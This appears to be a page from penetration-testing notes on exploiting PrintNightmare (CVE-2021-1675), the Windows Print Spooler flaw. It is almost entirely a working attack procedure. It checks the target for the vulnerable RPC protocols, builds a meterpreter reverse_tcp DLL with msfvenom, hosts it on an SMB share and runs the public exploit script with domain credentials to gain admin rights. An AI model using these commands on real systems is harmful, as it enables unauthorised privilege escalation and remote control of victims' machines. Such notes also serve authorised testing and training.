Print Nightmare (CVE-2021-1675)

Requirements: User

Intro

This is a privilege escalation vulnerability and RCE (Remote Command Execution) that takes advantage of a service called Spooler to get administrative privileges. Since spooler runs as admin once exploited, we get admin privileges. We can do it remotely too, using impacket and other useful tools.

Use: https://github.com/cube0x0/CVE-2021-1675

Requirements

Have access as a user on the machine.

Execution

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

If we see this as is shown here, then is vulnerable.

Creating a malicious .dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f dll > malicious.dll

Now start listening with a meterpreter session.

Start an SMB Server

smbserver.py share `pwd` -smb2support

Using the exploit

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'

PreviousToken Impersonation NextPass Attacks

Last updated 1 year ago